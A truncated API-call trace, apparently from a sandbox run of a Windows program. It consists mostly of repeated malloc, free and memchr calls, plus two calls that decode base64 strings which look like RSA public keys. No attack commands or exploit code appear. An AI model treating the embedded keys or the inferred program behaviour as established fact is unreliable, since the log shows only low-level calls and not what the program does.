[0155.598] free (_Block=0x0) [0155.598] malloc (_Size=0x140) returned 0x3dd4128 [0155.598] free (_Block=0x3e222c0) [0155.598] free (_Block=0x0) [0155.598] memchr (_Buf=0x362469d, _Val=32, _MaxCount=0x4) returned 0x0 [0155.598] malloc (_Size=0x5) returned 0x3f4c078 [0155.598] free (_Block=0x0) [0155.598] free (_Block=0x0) [0155.598] free (_Block=0x3f4bf68) [0155.598] free (_Block=0x3f653e0) [0155.598] free (_Block=0x3648ec0) [0155.598] free (_Block=0x3f4bf58) [0155.598] free (_Block=0x3f4bff8) [0155.598] free (_Block=0x3f4c078) [0155.598] free (_Block=0x3dd4128) [0155.598] memchr (_Buf=0x3f651e0, _Val=32, _MaxCount=0x10) returned 0x0 [0155.599] malloc (_Size=0x11) returned 0x3f654e0 [0155.599] free (_Block=0x0) [0155.599] malloc (_Size=0x40) returned 0x3e22398 [0155.599] free (_Block=0x0) [0155.599] free (_Block=0x0) [0155.599] free (_Block=0x3f654e0) [0155.599] free (_Block=0x3e22398) [0155.599] memchr (_Buf=0x3d803c8, _Val=32, _MaxCount=0x1c) returned 0x3d803d2 [0155.599] malloc (_Size=0xb) returned 0x3648ec0 [0155.599] free (_Block=0x0) [0155.599] malloc (_Size=0x40) returned 0x3e22548 [0155.599] free (_Block=0x0) [0155.599] free (_Block=0x0) [0155.599] memchr (_Buf=0x3d803d3, _Val=32, _MaxCount=0x11) returned 0x3d803da [0155.599] malloc (_Size=0x8) returned 0x3f4c088 [0155.599] free (_Block=0x0) [0155.599] free (_Block=0x0) [0155.599] memchr (_Buf=0x3d803db, _Val=32, _MaxCount=0x9) returned 0x0 [0155.599] malloc (_Size=0xa) returned 0x3648cb0 [0155.599] free (_Block=0x0) [0155.599] free (_Block=0x0) [0155.599] free (_Block=0x3648ec0) [0155.599] free (_Block=0x3f4c088) [0155.599] free (_Block=0x3648cb0) [0155.599] free (_Block=0x3e22548) [0155.599] memchr (_Buf=0x60e8c8, _Val=32, _MaxCount=0x40) returned 0x0 [0155.599] malloc (_Size=0x41) returned 0x60ec88 [0155.600] free (_Block=0x0) [0155.600] malloc (_Size=0x40) returned 0x3e22110 [0155.600] free (_Block=0x0) [0155.600] free (_Block=0x0) [0155.600] free (_Block=0x60ec88) [0155.600] free (_Block=0x3e22110) [0155.600] memchr (_Buf=0x60ebe8, _Val=32, _MaxCount=0x40) returned 0x0 [0155.600] malloc (_Size=0x41) returned 0x60ec88 [0155.600] free (_Block=0x0) [0155.600] malloc (_Size=0x40) returned 0x3e22500 [0155.600] free (_Block=0x0) [0155.600] free (_Block=0x0) [0155.600] free (_Block=0x60ec88) [0155.600] free (_Block=0x3e22500) [0155.600] memchr (_Buf=0x3e22308, _Val=32, _MaxCount=0x3c) returned 0x0 [0155.600] malloc (_Size=0x3d) returned 0x3e22398 [0155.600] free (_Block=0x0) [0155.600] malloc (_Size=0x40) returned 0x3e22740 [0155.600] free (_Block=0x0) [0155.600] free (_Block=0x0) [0155.600] free (_Block=0x3e22398) [0155.600] free (_Block=0x3e22740) [0155.600] memchr (_Buf=0x3d802d8, _Val=32, _MaxCount=0x1a) returned 0x3d802e0 [0155.600] malloc (_Size=0x9) returned 0x3648e18 [0155.600] free (_Block=0x0) [0155.600] malloc (_Size=0x40) returned 0x3e22500 [0155.600] free (_Block=0x0) [0155.600] free (_Block=0x0) [0155.601] memchr (_Buf=0x3d802e1, _Val=32, _MaxCount=0x11) returned 0x3d802e8 [0155.601] malloc (_Size=0x8) returned 0x3f4c0b8 [0155.601] free (_Block=0x0) [0155.601] free (_Block=0x0) [0155.601] memchr (_Buf=0x3d802e9, _Val=32, _MaxCount=0x9) returned 0x0 [0155.601] malloc (_Size=0xa) returned 0x3648ce0 [0155.601] free (_Block=0x0) [0155.601] free (_Block=0x0) [0155.601] free (_Block=0x3648e18) [0155.601] free (_Block=0x3f4c0b8) [0155.601] free (_Block=0x3648ce0) [0155.601] free (_Block=0x3e22500) [0155.601] memchr (_Buf=0x3e224b8, _Val=32, _MaxCount=0x3e) returned 0x3e224ca [0155.601] malloc (_Size=0x13) returned 0x3f653e0 [0155.601] free (_Block=0x0) [0155.601] malloc (_Size=0x40) returned 0x3e22158 [0155.601] free (_Block=0x0) [0155.601] free (_Block=0x0) [0155.601] memchr (_Buf=0x3e224cb, _Val=32, _MaxCount=0x2b) returned 0x0 [0155.601] malloc (_Size=0x2c) returned 0x36248e0 [0155.601] free (_Block=0x0) [0155.601] free (_Block=0x0) [0155.601] free (_Block=0x3f653e0) [0155.601] free (_Block=0x36248e0) [0155.601] free (_Block=0x3e22158) [0155.601] memchr (_Buf=0x3d80300, _Val=32, _MaxCount=0x1d) returned 0x3d80308 [0155.602] malloc (_Size=0x9) returned 0x3648c98 [0155.602] free (_Block=0x0) [0155.602] malloc (_Size=0x40) returned 0x3e22080 [0155.602] free (_Block=0x0) [0155.602] free (_Block=0x0) [0155.602] memchr (_Buf=0x3d80309, _Val=32, _MaxCount=0x14) returned 0x3d8030c [0155.602] malloc (_Size=0x4) returned 0x3f4c0c8 [0155.602] free (_Block=0x0) [0155.602] free (_Block=0x0) [0155.602] memchr (_Buf=0x3d8030d, _Val=32, _MaxCount=0x10) returned 0x3d80314 [0155.602] malloc (_Size=0x8) returned 0x3f4bfc8 [0155.602] free (_Block=0x0) [0155.602] free (_Block=0x0) [0155.602] memchr (_Buf=0x3d80315, _Val=32, _MaxCount=0x8) returned 0x3d80317 [0155.602] malloc (_Size=0x3) returned 0x3f4bfe8 [0155.602] free (_Block=0x0) [0155.602] free (_Block=0x0) [0155.602] memchr (_Buf=0x3d80318, _Val=32, _MaxCount=0x5) returned 0x0 [0155.602] malloc (_Size=0x6) returned 0x3f4c0b8 [0155.602] free (_Block=0x0) [0155.602] malloc (_Size=0x140) returned 0x3dd4500 [0155.602] free (_Block=0x3e22080) [0155.602] free (_Block=0x0) [0155.602] free (_Block=0x3648c98) [0155.603] free (_Block=0x3f4c0c8) [0155.603] free (_Block=0x3f4bfc8) [0155.603] free (_Block=0x3f4bfe8) [0155.603] free (_Block=0x3f4c0b8) [0155.603] free (_Block=0x3dd4500) [0155.603] memchr (_Buf=0x6066d8, _Val=32, _MaxCount=0x88) returned 0x6066dd [0155.603] malloc (_Size=0x6) returned 0x3f4bfc8 [0155.603] free (_Block=0x0) [0155.603] malloc (_Size=0x40) returned 0x3e22620 [0155.603] free (_Block=0x0) [0155.603] free (_Block=0x0) [0155.603] memchr (_Buf=0x6066de, _Val=32, _MaxCount=0x82) returned 0x6066e6 [0155.603] malloc (_Size=0x9) returned 0x3648e18 [0155.603] free (_Block=0x0) [0155.603] free (_Block=0x0) [0155.603] memchr (_Buf=0x6066e7, _Val=32, _MaxCount=0x79) returned 0x6066ef [0155.603] malloc (_Size=0x9) returned 0x3648cf8 [0155.603] free (_Block=0x0) [0155.603] free (_Block=0x0) [0155.603] memchr (_Buf=0x6066f0, _Val=32, _MaxCount=0x70) returned 0x6066fc [0155.603] malloc (_Size=0xd) returned 0x3648d10 [0155.603] free (_Block=0x0) [0155.603] free (_Block=0x0) [0155.603] memchr (_Buf=0x6066fd, _Val=32, _MaxCount=0x63) returned 0x606707 [0155.603] malloc (_Size=0xb) returned 0x3648d88 [0155.604] free (_Block=0x0) [0155.604] malloc (_Size=0x140) returned 0x3dd4270 [0155.604] free (_Block=0x3e22620) [0155.604] free (_Block=0x0) [0155.604] memchr (_Buf=0x606708, _Val=32, _MaxCount=0x58) returned 0x606711 [0155.604] malloc (_Size=0xa) returned 0x3648e30 [0155.604] free (_Block=0x0) [0155.604] free (_Block=0x0) [0155.604] memchr (_Buf=0x606712, _Val=32, _MaxCount=0x4e) returned 0x60671d [0155.604] malloc (_Size=0xc) returned 0x3648d40 [0155.604] free (_Block=0x0) [0155.604] free (_Block=0x0) [0155.604] memchr (_Buf=0x60671e, _Val=32, _MaxCount=0x42) returned 0x606728 [0155.604] malloc (_Size=0xb) returned 0x3648ea8 [0155.604] free (_Block=0x0) [0155.604] free (_Block=0x0) [0155.604] memchr (_Buf=0x606729, _Val=32, _MaxCount=0x37) returned 0x606731 [0155.604] malloc (_Size=0x9) returned 0x3648ec0 [0155.604] free (_Block=0x0) [0155.604] free (_Block=0x0) [0155.604] memchr (_Buf=0x606732, _Val=32, _MaxCount=0x2e) returned 0x60673e [0155.604] malloc (_Size=0xd) returned 0x3648c68 [0155.604] free (_Block=0x0) [0155.604] free (_Block=0x0) [0155.604] memchr (_Buf=0x60673f, _Val=32, _MaxCount=0x21) returned 0x60674c [0155.604] malloc (_Size=0xe) returned 0x3648c98 [0155.604] free (_Block=0x0) [0155.605] free (_Block=0x0) [0155.605] memchr (_Buf=0x60674d, _Val=32, _MaxCount=0x13) returned 0x606756 [0155.605] malloc (_Size=0xa) returned 0x3648cb0 [0155.605] free (_Block=0x0) [0155.605] free (_Block=0x0) [0155.605] memchr (_Buf=0x606757, _Val=32, _MaxCount=0x9) returned 0x0 [0155.605] malloc (_Size=0xa) returned 0x3648ce0 [0155.605] free (_Block=0x0) [0155.605] free (_Block=0x0) [0155.605] free (_Block=0x3f4bfc8) [0155.605] free (_Block=0x3648e18) [0155.605] free (_Block=0x3648cf8) [0155.605] free (_Block=0x3648d10) [0155.605] free (_Block=0x3648d88) [0155.605] free (_Block=0x3648e30) [0155.605] free (_Block=0x3648d40) [0155.605] free (_Block=0x3648ea8) [0155.605] free (_Block=0x3648ec0) [0155.605] free (_Block=0x3648c68) [0155.605] free (_Block=0x3648c98) [0155.605] free (_Block=0x3648cb0) [0155.605] free (_Block=0x3648ce0) [0155.605] free (_Block=0x3dd4270) [0155.605] memchr (_Buf=0x3d802b0, _Val=32, _MaxCount=0x1d) returned 0x3d802b9 [0155.605] malloc (_Size=0xa) returned 0x3648c68 [0155.605] free (_Block=0x0) [0155.605] malloc (_Size=0x40) returned 0x3e22398 [0155.605] free (_Block=0x0) [0155.606] free (_Block=0x0) [0155.606] memchr (_Buf=0x3d802ba, _Val=32, _MaxCount=0x13) returned 0x3d802c4 [0155.606] malloc (_Size=0xb) returned 0x3648c98 [0155.606] free (_Block=0x0) [0155.606] free (_Block=0x0) [0155.606] memchr (_Buf=0x3d802c5, _Val=32, _MaxCount=0x8) returned 0x0 [0155.606] malloc (_Size=0x9) returned 0x3648d10 [0155.606] free (_Block=0x0) [0155.606] free (_Block=0x0) [0155.606] free (_Block=0x3648c68) [0155.606] free (_Block=0x3648c98) [0155.606] free (_Block=0x3648d10) [0155.606] free (_Block=0x3e22398) [0155.606] memchr (_Buf=0x3e22350, _Val=32, _MaxCount=0x3d) returned 0x3e2235b [0155.606] malloc (_Size=0xc) returned 0x3648ce0 [0155.606] free (_Block=0x0) [0155.606] malloc (_Size=0x40) returned 0x3e22230 [0155.606] free (_Block=0x0) [0155.606] free (_Block=0x0) [0155.606] memchr (_Buf=0x3e2235c, _Val=32, _MaxCount=0x31) returned 0x3e22360 [0155.606] malloc (_Size=0x5) returned 0x3f4bfb8 [0155.606] free (_Block=0x0) [0155.606] free (_Block=0x0) [0155.606] memchr (_Buf=0x3e22361, _Val=32, _MaxCount=0x2c) returned 0x3e22365 [0155.606] malloc (_Size=0x5) returned 0x3f4bf78 [0155.606] free (_Block=0x0) [0155.607] free (_Block=0x0) [0155.607] memchr (_Buf=0x3e22366, _Val=32, _MaxCount=0x27) returned 0x3e2236a [0155.607] malloc (_Size=0x5) returned 0x3f4c078 [0155.607] free (_Block=0x0) [0155.607] free (_Block=0x0) [0155.607] memchr (_Buf=0x3e2236b, _Val=32, _MaxCount=0x22) returned 0x3e2236f [0155.607] malloc (_Size=0x5) returned 0x3f4c0c8 [0155.607] free (_Block=0x0) [0155.607] malloc (_Size=0x140) returned 0x3dd48d8 [0155.607] free (_Block=0x3e22230) [0155.607] free (_Block=0x0) [0155.607] memchr (_Buf=0x3e22370, _Val=32, _MaxCount=0x1d) returned 0x3e22374 [0155.607] malloc (_Size=0x5) returned 0x3f4c0e8 [0155.607] free (_Block=0x0) [0155.607] free (_Block=0x0) [0155.607] memchr (_Buf=0x3e22375, _Val=32, _MaxCount=0x18) returned 0x3e22379 [0155.607] malloc (_Size=0x5) returned 0x3f4c098 [0155.608] free (_Block=0x0) [0155.608] free (_Block=0x0) [0155.608] memchr (_Buf=0x3e2237a, _Val=32, _MaxCount=0x13) returned 0x3e2237e [0155.608] malloc (_Size=0x5) returned 0x3f4c0b8 [0155.608] free (_Block=0x0) [0155.608] free (_Block=0x0) [0155.608] memchr (_Buf=0x3e2237f, _Val=32, _MaxCount=0xe) returned 0x3e22383 [0155.608] malloc (_Size=0x5) returned 0x3f4bf48 [0155.608] free (_Block=0x0) [0155.608] free (_Block=0x0) [0155.608] memchr (_Buf=0x3e22384, _Val=32, _MaxCount=0x9) returned 0x3e22388 [0155.608] malloc (_Size=0x5) returned 0x3f4c018 [0155.608] free (_Block=0x0) [0155.608] free (_Block=0x0) [0155.608] memchr (_Buf=0x3e22389, _Val=32, _MaxCount=0x4) returned 0x0 [0155.608] malloc (_Size=0x5) returned 0x3f4c0f8 [0155.608] free (_Block=0x0) [0155.608] free (_Block=0x0) [0155.608] free (_Block=0x3648ce0) [0155.608] free (_Block=0x3f4bfb8) [0155.608] free (_Block=0x3f4bf78) [0155.608] free (_Block=0x3f4c078) [0155.608] free (_Block=0x3f4c0c8) [0155.608] free (_Block=0x3f4c0e8) [0155.608] free (_Block=0x3f4c098) [0155.608] free (_Block=0x3f4c0b8) [0155.608] free (_Block=0x3f4bf48) [0155.608] free (_Block=0x3f4c018) [0155.609] free (_Block=0x3f4c0f8) [0155.609] free (_Block=0x3dd48d8) [0155.609] memchr (_Buf=0x3648f08, _Val=32, _MaxCount=0xe) returned 0x3648f0e [0155.609] malloc (_Size=0x7) returned 0x3f4c028 [0155.609] free (_Block=0x0) [0155.609] malloc (_Size=0x40) returned 0x3e22620 [0155.609] free (_Block=0x0) [0155.609] free (_Block=0x0) [0155.609] memchr (_Buf=0x3648f0f, _Val=32, _MaxCount=0x7) returned 0x0 [0155.609] malloc (_Size=0x8) returned 0x3f4bff8 [0155.609] free (_Block=0x0) [0155.609] free (_Block=0x0) [0155.609] free (_Block=0x3f4c028) [0155.609] free (_Block=0x3f4bff8) [0155.609] free (_Block=0x3e22620) [0155.609] memchr (_Buf=0x3624ad8, _Val=32, _MaxCount=0x28) returned 0x3624ae1 [0155.609] malloc (_Size=0xa) returned 0x3648e30 [0155.609] free (_Block=0x0) [0155.609] malloc (_Size=0x40) returned 0x3e22548 [0155.609] free (_Block=0x0) [0155.609] free (_Block=0x0) [0155.609] memchr (_Buf=0x3624ae2, _Val=32, _MaxCount=0x1e) returned 0x3624aec [0155.609] malloc (_Size=0xb) returned 0x3648ea8 [0155.609] free (_Block=0x0) [0155.609] free (_Block=0x0) [0155.609] memchr (_Buf=0x3624aed, _Val=32, _MaxCount=0x13) returned 0x3624af7 [0155.609] malloc (_Size=0xb) returned 0x3648c68 [0155.609] free (_Block=0x0) [0155.610] free (_Block=0x0) [0155.610] memchr (_Buf=0x3624af8, _Val=32, _MaxCount=0x8) returned 0x0 [0155.610] malloc (_Size=0x9) returned 0x3648d40 [0155.610] free (_Block=0x0) [0155.610] free (_Block=0x0) [0155.610] free (_Block=0x3648e30) [0155.610] free (_Block=0x3648ea8) [0155.610] free (_Block=0x3648c68) [0155.610] free (_Block=0x3648d40) [0155.610] free (_Block=0x3e22548) [0155.610] memchr (_Buf=0x60af20, _Val=32, _MaxCount=0x66) returned 0x60af31 [0155.610] malloc (_Size=0x12) returned 0x3f653e0 [0155.610] free (_Block=0x0) [0155.610] malloc (_Size=0x40) returned 0x3e22590 [0155.610] free (_Block=0x0) [0155.610] free (_Block=0x0) [0155.610] memchr (_Buf=0x60af32, _Val=32, _MaxCount=0x54) returned 0x60af5a [0155.610] malloc (_Size=0x29) returned 0x36248a8 [0155.610] free (_Block=0x0) [0155.610] free (_Block=0x0) [0155.610] memchr (_Buf=0x60af5b, _Val=32, _MaxCount=0x2b) returned 0x0 [0155.610] malloc (_Size=0x2c) returned 0x36249f8 [0155.610] free (_Block=0x0) [0155.610] free (_Block=0x0) [0155.610] free (_Block=0x3f653e0) [0155.610] free (_Block=0x36248a8) [0155.610] free (_Block=0x36249f8) [0155.611] free (_Block=0x3e22590) [0155.611] memchr (_Buf=0x3648e00, _Val=32, _MaxCount=0x9) returned 0x0 [0155.611] malloc (_Size=0xa) returned 0x3648c68 [0155.611] free (_Block=0x0) [0155.611] malloc (_Size=0x40) returned 0x3e22230 [0155.611] free (_Block=0x0) [0155.611] free (_Block=0x0) [0155.611] free (_Block=0x3648c68) [0155.611] free (_Block=0x3e22230) [0155.611] memchr (_Buf=0x3d803f0, _Val=32, _MaxCount=0x1e) returned 0x3d803fa [0155.611] malloc (_Size=0xb) returned 0x3648e30 [0155.611] free (_Block=0x0) [0155.611] malloc (_Size=0x40) returned 0x3e22398 [0155.611] free (_Block=0x0) [0155.611] free (_Block=0x0) [0155.611] memchr (_Buf=0x3d803fb, _Val=32, _MaxCount=0x13) returned 0x3d803fe [0155.611] malloc (_Size=0x4) returned 0x3f4bf88 [0155.611] free (_Block=0x0) [0155.611] free (_Block=0x0) [0155.611] memchr (_Buf=0x3d803ff, _Val=32, _MaxCount=0xf) returned 0x3d80405 [0155.611] malloc (_Size=0x7) returned 0x3f4bf28 [0155.611] free (_Block=0x0) [0155.611] free (_Block=0x0) [0155.611] memchr (_Buf=0x3d80406, _Val=32, _MaxCount=0x8) returned 0x0 [0155.611] malloc (_Size=0x9) returned 0x3648ea8 [0155.611] free (_Block=0x0) [0155.611] free (_Block=0x0) [0155.611] free (_Block=0x3648e30) [0155.612] free (_Block=0x3f4bf88) [0155.612] free (_Block=0x3f4bf28) [0155.612] free (_Block=0x3648ea8) [0155.612] free (_Block=0x3e22398) [0155.612] memchr (_Buf=0x60eaf8, _Val=32, _MaxCount=0x40) returned 0x0 [0155.612] malloc (_Size=0x41) returned 0x60ee68 [0155.612] free (_Block=0x0) [0155.612] malloc (_Size=0x40) returned 0x3e225d8 [0155.612] free (_Block=0x0) [0155.612] free (_Block=0x0) [0155.612] malloc (_Size=0x41) returned 0x60e9b8 [0155.612] free (_Block=0x0) [0155.612] free (_Block=0x60ee68) [0155.612] free (_Block=0x3e225d8) [0155.612] memchr (_Buf=0x60eb48, _Val=32, _MaxCount=0x40) returned 0x0 [0155.612] malloc (_Size=0x41) returned 0x60ee68 [0155.612] free (_Block=0x0) [0155.612] malloc (_Size=0x40) returned 0x3e22668 [0155.612] free (_Block=0x0) [0155.612] free (_Block=0x0) [0155.612] malloc (_Size=0x81) returned 0x60c410 [0155.612] free (_Block=0x60e9b8) [0155.612] free (_Block=0x60ee68) [0155.612] free (_Block=0x3e22668) [0155.612] memchr (_Buf=0x3e22470, _Val=32, _MaxCount=0x3c) returned 0x0 [0155.612] malloc (_Size=0x3d) returned 0x3e226b0 [0155.612] free (_Block=0x0) [0155.612] malloc (_Size=0x40) returned 0x3e22500 [0155.613] free (_Block=0x0) [0155.613] free (_Block=0x0) [0155.613] malloc (_Size=0xc1) returned 0x3691d20 [0155.613] free (_Block=0x60c410) [0155.613] free (_Block=0x3e226b0) [0155.613] free (_Block=0x3e22500) [0155.613] memchr (_Buf=0x3d80120, _Val=32, _MaxCount=0x1c) returned 0x3d80128 [0155.613] malloc (_Size=0x9) returned 0x3648c68 [0155.613] free (_Block=0x0) [0155.613] malloc (_Size=0x40) returned 0x3e22230 [0155.613] free (_Block=0x0) [0155.613] free (_Block=0x0) [0155.613] memchr (_Buf=0x3d80129, _Val=32, _MaxCount=0x13) returned 0x3d8012c [0155.613] malloc (_Size=0x4) returned 0x3f4bf68 [0155.613] free (_Block=0x0) [0155.613] free (_Block=0x0) [0155.613] memchr (_Buf=0x3d8012d, _Val=32, _MaxCount=0xf) returned 0x3d80133 [0155.613] malloc (_Size=0x7) returned 0x3f4c038 [0155.613] free (_Block=0x0) [0155.613] free (_Block=0x0) [0155.613] memchr (_Buf=0x3d80134, _Val=32, _MaxCount=0x8) returned 0x0 [0155.613] malloc (_Size=0x9) returned 0x3648c98 [0155.613] free (_Block=0x0) [0155.613] free (_Block=0x0) [0155.613] CryptStringToBinaryA (in: pszString="MIGJAoGBANcosixpJvaXQuhozv2Ugm10yzhCu5TuDlnD1Ga3cJQQt7h1S//6MXr0coZNc1nNfpuHlMx3rUGUezLyYUh1AYUmiRUy+OPMhHJcGKERBw3+Yx2snzYgtOHP1wprg6d9wyjGCqi7OZd1KgMSPx194wXmpKZdLWtYgOZ4ZBkb2M1pAgMBAAE=", cchString=0xbc, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x316f488, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x316f488, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0155.613] malloc (_Size=0x8c) returned 0x3d81910 [0155.614] free (_Block=0x0) [0155.614] CryptStringToBinaryA (in: pszString="MIGJAoGBANcosixpJvaXQuhozv2Ugm10yzhCu5TuDlnD1Ga3cJQQt7h1S//6MXr0coZNc1nNfpuHlMx3rUGUezLyYUh1AYUmiRUy+OPMhHJcGKERBw3+Yx2snzYgtOHP1wprg6d9wyjGCqi7OZd1KgMSPx194wXmpKZdLWtYgOZ4ZBkb2M1pAgMBAAE=", cchString=0xbc, dwFlags=0x6, pbBinary=0x3d81910, pcbBinary=0x316f488, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d81910, pcbBinary=0x316f488, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0155.614] malloc (_Size=0x8c) returned 0x3d819a8 [0155.614] free (_Block=0x0) [0155.614] free (_Block=0x0) [0155.614] free (_Block=0x3d81910) [0155.614] free (_Block=0x3648c68) [0155.614] free (_Block=0x3f4bf68) [0155.614] free (_Block=0x3f4c038) [0155.614] free (_Block=0x3648c98) [0155.614] free (_Block=0x3e22230) [0155.614] memchr (_Buf=0x3648de8, _Val=32, _MaxCount=0xb) returned 0x0 [0155.614] malloc (_Size=0xc) returned 0x3648d88 [0155.614] free (_Block=0x0) [0155.614] malloc (_Size=0x40) returned 0x3e221a0 [0155.614] free (_Block=0x0) [0155.614] free (_Block=0x0) [0155.614] free (_Block=0x3648d88) [0155.614] free (_Block=0x3e221a0) [0155.614] memchr (_Buf=0x3d80148, _Val=32, _MaxCount=0x1e) returned 0x3d80152 [0155.614] malloc (_Size=0xb) returned 0x3648e18 [0155.614] free (_Block=0x0) [0155.614] malloc (_Size=0x40) returned 0x3e22230 [0155.614] free (_Block=0x0) [0155.614] free (_Block=0x0) [0155.614] memchr (_Buf=0x3d80153, _Val=32, _MaxCount=0x13) returned 0x3d80156 [0155.614] malloc (_Size=0x4) returned 0x3f4bf58 [0155.614] free (_Block=0x0) [0155.615] free (_Block=0x0) [0155.615] memchr (_Buf=0x3d80157, _Val=32, _MaxCount=0xf) returned 0x3d8015d [0155.615] malloc (_Size=0x7) returned 0x3f4bff8 [0155.615] free (_Block=0x0) [0155.615] free (_Block=0x0) [0155.615] memchr (_Buf=0x3d8015e, _Val=32, _MaxCount=0x8) returned 0x0 [0155.615] malloc (_Size=0x9) returned 0x3648e30 [0155.615] free (_Block=0x0) [0155.615] free (_Block=0x0) [0155.615] free (_Block=0x3648e18) [0155.615] free (_Block=0x3f4bf58) [0155.615] free (_Block=0x3f4bff8) [0155.615] free (_Block=0x3648e30) [0155.615] free (_Block=0x3e22230) [0155.615] memchr (_Buf=0x60ed28, _Val=32, _MaxCount=0x40) returned 0x0 [0155.615] malloc (_Size=0x41) returned 0x60e9b8 [0155.615] free (_Block=0x0) [0155.615] malloc (_Size=0x40) returned 0x3e22590 [0155.615] free (_Block=0x0) [0155.615] free (_Block=0x0) [0155.615] free (_Block=0x60e9b8) [0155.615] free (_Block=0x3e22590) [0155.615] memchr (_Buf=0x60eb98, _Val=32, _MaxCount=0x40) returned 0x0 [0155.615] malloc (_Size=0x41) returned 0x60e9b8 [0155.615] free (_Block=0x0) [0155.615] malloc (_Size=0x40) returned 0x3e22668 [0155.616] free (_Block=0x0) [0155.616] free (_Block=0x0) [0155.616] free (_Block=0x60e9b8) [0155.616] free (_Block=0x3e22668) [0155.616] memchr (_Buf=0x3e22038, _Val=32, _MaxCount=0x3c) returned 0x0 [0155.616] malloc (_Size=0x3d) returned 0x3e220c8 [0155.616] free (_Block=0x0) [0155.616] malloc (_Size=0x40) returned 0x3e22110 [0155.616] free (_Block=0x0) [0155.616] free (_Block=0x0) [0155.616] free (_Block=0x3e220c8) [0155.616] free (_Block=0x3e22110) [0155.616] memchr (_Buf=0x3d80238, _Val=32, _MaxCount=0x1c) returned 0x3d80240 [0155.616] malloc (_Size=0x9) returned 0x3648c98 [0155.616] free (_Block=0x0) [0155.616] malloc (_Size=0x40) returned 0x3e222c0 [0155.616] free (_Block=0x0) [0155.616] free (_Block=0x0) [0155.616] memchr (_Buf=0x3d80241, _Val=32, _MaxCount=0x13) returned 0x3d80244 [0155.616] malloc (_Size=0x4) returned 0x3f4c098 [0155.616] free (_Block=0x0) [0155.616] free (_Block=0x0) [0155.616] memchr (_Buf=0x3d80245, _Val=32, _MaxCount=0xf) returned 0x3d8024b [0155.616] malloc (_Size=0x7) returned 0x3f4bf48 [0155.616] free (_Block=0x0) [0155.616] free (_Block=0x0) [0155.616] memchr (_Buf=0x3d8024c, _Val=32, _MaxCount=0x8) returned 0x0 [0155.617] malloc (_Size=0x9) returned 0x3648e18 [0155.617] free (_Block=0x0) [0155.617] free (_Block=0x0) [0155.617] CryptStringToBinaryA (in: pszString="MIGJAoGBAMk5dc56IZi+tNwrTsg5YuIXfbtmuT4Ljsf3qPd62PD8sEom09WzCus76MA6vUfm3Yxnxf+sVE/30K/0wkWi2kmFNtrI09U91o49maK2uz9DcOynJFKBU54Ji/1NPocpK1pJl4MevWv34MYCkGELSp/WhYIxMg7hxPR4EmnaCORlAgMBAAE=", cchString=0xbc, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x316f488, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x316f488, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0155.617] malloc (_Size=0x8c) returned 0x3d81910 [0155.617] free (_Block=0x0) [0155.617] CryptStringToBinaryA (in: pszString="MIGJAoGBAMk5dc56IZi+tNwrTsg5YuIXfbtmuT4Ljsf3qPd62PD8sEom09WzCus76MA6vUfm3Yxnxf+sVE/30K/0wkWi2kmFNtrI09U91o49maK2uz9DcOynJFKBU54Ji/1NPocpK1pJl4MevWv34MYCkGELSp/WhYIxMg7hxPR4EmnaCORlAgMBAAE=", cchString=0xbc, dwFlags=0x6, pbBinary=0x3d81910, pcbBinary=0x316f488, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d81910, pcbBinary=0x316f488, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0155.617] malloc (_Size=0x8c) returned 0x3df04b8 [0155.617] free (_Block=0x0) [0155.617] free (_Block=0x0) [0155.617] free (_Block=0x3d81910) [0155.617] free (_Block=0x3648c98) [0155.617] free (_Block=0x3f4c098) [0155.617] free (_Block=0x3f4bf48) [0155.617] free (_Block=0x3648e18) [0155.617] free (_Block=0x3e222c0) [0155.617] memchr (_Buf=0x3f65280, _Val=32, _MaxCount=0x13) returned 0x0 [0155.617] malloc (_Size=0x14) returned 0x3f654e0 [0155.617] free (_Block=0x0) [0155.617] malloc (_Size=0x40) returned 0x3e22590 [0155.617] free (_Block=0x0) [0155.617] free (_Block=0x0) [0155.617] free (_Block=0x3f654e0) [0155.617] free (_Block=0x3e22590) [0155.617] memchr (_Buf=0x3d80080, _Val=32, _MaxCount=0x19) returned 0x3d8008a [0155.617] malloc (_Size=0xb) returned 0x3648d40 [0155.617] free (_Block=0x0) [0155.618] malloc (_Size=0x40) returned 0x3e225d8 [0155.618] free (_Block=0x0) [0155.618] free (_Block=0x0) [0155.618] memchr (_Buf=0x3d8008b, _Val=32, _MaxCount=0xe) returned 0x0 [0155.618] malloc (_Size=0xf) returned 0x3648c68 [0155.618] free (_Block=0x0) [0155.618] free (_Block=0x0) [0155.618] free (_Block=0x3648d40) [0155.618] free (_Block=0x3648c68) [0155.618] free (_Block=0x3e225d8) [0155.618] memchr (_Buf=0x60ed78, _Val=32, _MaxCount=0x40) returned 0x0 [0155.618] malloc (_Size=0x41) returned 0x60ee68 [0155.618] free (_Block=0x0) [0155.618] malloc (_Size=0x40) returned 0x3e22080 [0155.618] free (_Block=0x0) [0155.618] free (_Block=0x0) [0155.618] free (_Block=0x60ee68) [0155.618] free (_Block=0x3e22080) [0155.618] memchr (_Buf=0x60edc8, _Val=32, _MaxCount=0x40) returned 0x0 [0155.618] malloc (_Size=0x41) returned 0x60ee68 [0155.618] free (_Block=0x0) [0155.618] malloc (_Size=0x40) returned 0x3e220c8 [0155.618] free (_Block=0x0) [0155.618] free (_Block=0x0) [0155.618] free (_Block=0x60ee68) [0155.618] free (_Block=0x3e220c8) [0155.618] memchr (_Buf=0x3624838, _Val=32, _MaxCount=0x2c) returned 0x0 [0155.618] malloc (_Size=0x2d) returned 0x36249c0 [0155.619] free (_Block=0x0) [0155.619] malloc (_Size=0x40) returned 0x3e221e8 [0155.619] free (_Block=0x0) [0155.619] free (_Block=0x0) [0155.619] free (_Block=0x36249c0) [0155.619] free (_Block=0x3e221e8) [0155.619] memchr (_Buf=0x3f65340, _Val=32, _MaxCount=0x17) returned 0x3f65348 [0155.619] malloc (_Size=0x9) returned 0x3648e18 [0155.619] free (_Block=0x0) [0155.619] malloc (_Size=0x40) returned 0x3e22398 [0155.619] free (_Block=0x0) [0155.619] free (_Block=0x0) [0155.619] memchr 